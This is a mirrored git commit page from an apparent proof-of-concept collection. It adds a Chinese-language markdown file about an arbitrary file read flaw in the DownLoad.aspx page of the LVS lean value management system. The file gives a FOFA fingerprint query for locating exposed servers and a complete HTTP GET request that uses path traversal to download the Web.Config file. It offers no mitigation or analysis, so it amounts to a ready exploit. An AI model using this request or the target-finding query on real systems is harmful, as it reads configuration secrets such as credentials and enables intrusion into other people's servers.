mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-28 13:25:35 +08:00
523更新漏洞
This commit is contained in:
24
LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md
Normal file
24
LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞.md
Normal file
@@ -0,0 +1,24 @@
|
||||
## LVS精益价值管理系统DownLoad.aspx存在任意文件读取漏洞
|
||||
|
||||
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
|
||||
```
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user